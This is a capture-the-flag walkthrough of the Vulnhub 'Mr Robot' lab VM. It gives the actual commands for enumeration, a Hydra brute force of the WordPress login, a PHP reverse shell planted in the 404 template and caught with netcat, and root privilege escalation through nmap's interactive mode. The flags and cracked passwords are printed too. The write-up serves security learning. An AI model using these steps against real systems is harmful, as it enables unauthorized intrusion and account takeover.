Mr Robot CTF
Available on Vulnhub
Available on Vulnhub
A quick and easy port scan:
nmap 192.168.18.45
Lets check out what’s running on port 80:
This website doesn’t do too much, a few commands yet nothing progressive. Let’s look about some more.
/robots.txt User-agent: * fsocity.dic key-1-of-3.txt
Ok this looks interesting…
/key-1-of-3.txt 073403c8a58a1f80d943455fb30724b9
Great we have our first key and have downloaded a dictionary file from /fsocity.dic
On further examination our fsociety.dic file of 858160 words appears to be messy and contains duplicates. We may need this for brute force attacks, let’s remove the duplicates.
sort fsocity.dic | uniq | wc -l 11451 cat fsocity.dic | sort | uniq > fsocity.txt
Great, we have reduced the dictionary file by 846709 words from 858160 to 11451.
Lets look around some more and fire up Dirbuster:
dirb http://192.168.18.45 /0
While dirb continues running, I checkout /0
(the first result ) and find ‘just another WordPress site’.
Ok let’s try the default WordPress login page /wp-admin
. Great, a login page, i’ve watched the series let’s play about with some obvious entries.
Username and password ‘admin’ shows an ‘invalid username’ error. Username and password ‘elliot’ throws an ‘invalid password’ error. Great, so it looks like we have a valid username ‘elliot’. I wonder if we can brute force entry with our password list? Let’s fire up Burp Suite to figure how the login request is being sent to the server.
POST /wp-login.php HTTP/1.1 Host: 192.168.18.45 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.18.45/wp-login.php Content-Type: application/x-www-form-urlencoded Content-Length: 100 Cookie: s_cc=true; s_fid=1CA6116ACDD798E8-1D577C92DEB71639; s_nr=1552942461209; s_sq=%5B%5BB%5D%5D; wordpress_test_cookie=WP+Cookie+check Connection: close Upgrade-Insecure-Requests: 1 log=elliot&pwd=hi&wp-submit=Log+In&redirect_to=http%3A%2F%2F192.168.18.45%2Fwp-admin%2F&testcookie=1
Now we can fire up Hydra to try brute force the password.
hydra -vV -l elliot -P fsocity.txt 192.168.18.45 http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=is incorrect'
Wait a few minutes…
[80][http-post-form] host: 192.168.18.45 login: elliot password: ER28-0652 1 of 1 target successfully completed, 1 valid password found
Great we have access to the WordPress CMS. Let’s get a shell, we will upload a php reverse shell into the 404 template.
On our Kali machine I copy the contents of /usr/share/webshells/php/php-reverse-shell.php
and paste it into the /404 (via the default WordPress CMS editor) ensuring the values for the reverse connection are set to my own netcat listening machine on port 444.
We hit save and set up a netcat listener nc -nlvp 444
. We then open a new browser tab and execute /404
to run our payload.
Success, we have a shell. We now spawn a tty python -c 'import pty; pty.spawn("bin/sh")'
We snoop around, in /home
we find /robot
and inside we find a raw md5 hash ‘c3fcd3d76192e4007dfb496cca67e13b’ and key/flag 2 that we do not have permission to read. I googled the hash and the result is known to be ‘abcdefghijklmnopqrstuvwxyz’.
We now su robot
and try the decrypted password. Success! we can now cat key-2-of-3.txt
revealing the second flag ‘822c73956184f694993bede3eb39f959’.
Time to root, looking around I decide to take a look at files with the SUID bit set.
find / -perm -4000 -type f 2>/dev/null find / -perm -4000 -type f 2>/dev/null /bin/ping /bin/umount /bin/mount /bin/ping6 /bin/su /usr/bin/passwd /usr/bin/newgrp /usr/bin/chsh /usr/bin/chfn /usr/bin/gpasswd /usr/bin/sudo /usr/local/bin/nmap /usr/lib/openssh/ssh-keysign /usr/lib/eject/dmcrypt-get-device /usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper /usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper /usr/lib/pt_chown
nmap? let’s see.
nmap -v nmap -v Starting nmap 3.81
A quick google of nmap 3.81 priv esc shows me I may be able to escape nmap into a shell.
*sudo nmap --interactive will show id as root. nmap --interactive nmap$ !sh #id uid=1002(robot) gid=1002(robot) euid=0(root) groups=0(root),1002(robot) cd /root cat key-3-of-3.txt 04787ddef27c3dee1ee161b21670b4e4
Pwned 😀